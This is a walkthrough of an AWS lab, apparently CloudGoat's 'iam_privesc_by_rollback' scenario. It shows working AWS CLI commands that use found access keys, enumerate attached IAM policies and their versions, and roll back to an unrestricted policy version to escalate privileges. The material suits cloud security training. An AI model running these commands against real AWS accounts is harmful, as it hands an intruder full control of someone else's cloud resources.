We get a raynor's access_key and secret_key - Let's configure the IAM profile
aws configure --profile ray
[ACCESS KEY]:
[SECRET KEY]:
....
So that we've now created a IAM profile ray - Let's see if we have the privilege to create a demo user
aws iam create-user --user-name demo --profile ray
An error occurred (AccessDenied) when calling the CreateUser operation: User: arn:aws:iam::242643118057:user/raynor-iam_privesc_by_rollback_cgidq5mcziu8uh is not authorized to perform: iam:CreateUser on resource: arn:aws:iam::242643118057:user/demo because no identity-based policy allows the iam:CreateUser action
Sadly, we don't have the access to create
Let's dig deep by enumerating the policies attached with the IAM user raynor !
aws iam list-attached-user-policies --user-name raynor-iam_privesc_by_rollback_cgidq5mcziu8uh --profile ray
{
"AttachedPolicies": [
{
"PolicyName": "cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh",
"PolicyArn": "arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh"
}
]
}
Let's quickly make a note of that PolicyArn
Now that we know we have few policies attached - let's try getting the policy version
aws iam get-policy-version --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn, --version-id
Seems like we require the version id
Let's try getting that first !
aws iam list-policy-versions --profile ray
usage: aws [options] <command> <subcommand> [<subcommand> ...] [parameters]
To see help text, you can run:
aws help
aws <command> help
aws <command> <subcommand> help
aws: error: the following arguments are required: --policy-arn
Let's just paste the copied PolicyArn and list the version ids
V4 => Deny access to all actions and resources unless the request is coming from source IP address of the request matches one of the specified IP address ranges
V2 => It grants unrestricted access to all actions ("Action": "") for all resources ("Resource": "") within the AWS account
This is the policy we need to abuse - Let's set it as our default policy !
aws iam set-default-policy-version --policy-arn arn:aws:iam::242643118057:policy/cg-raynor-policy-iam_privesc_by_rollback_cgidq5mcziu8uh --version-id v2 --profile ray
Now lets cross-check if the v2 is our default policy version - list-policy-versions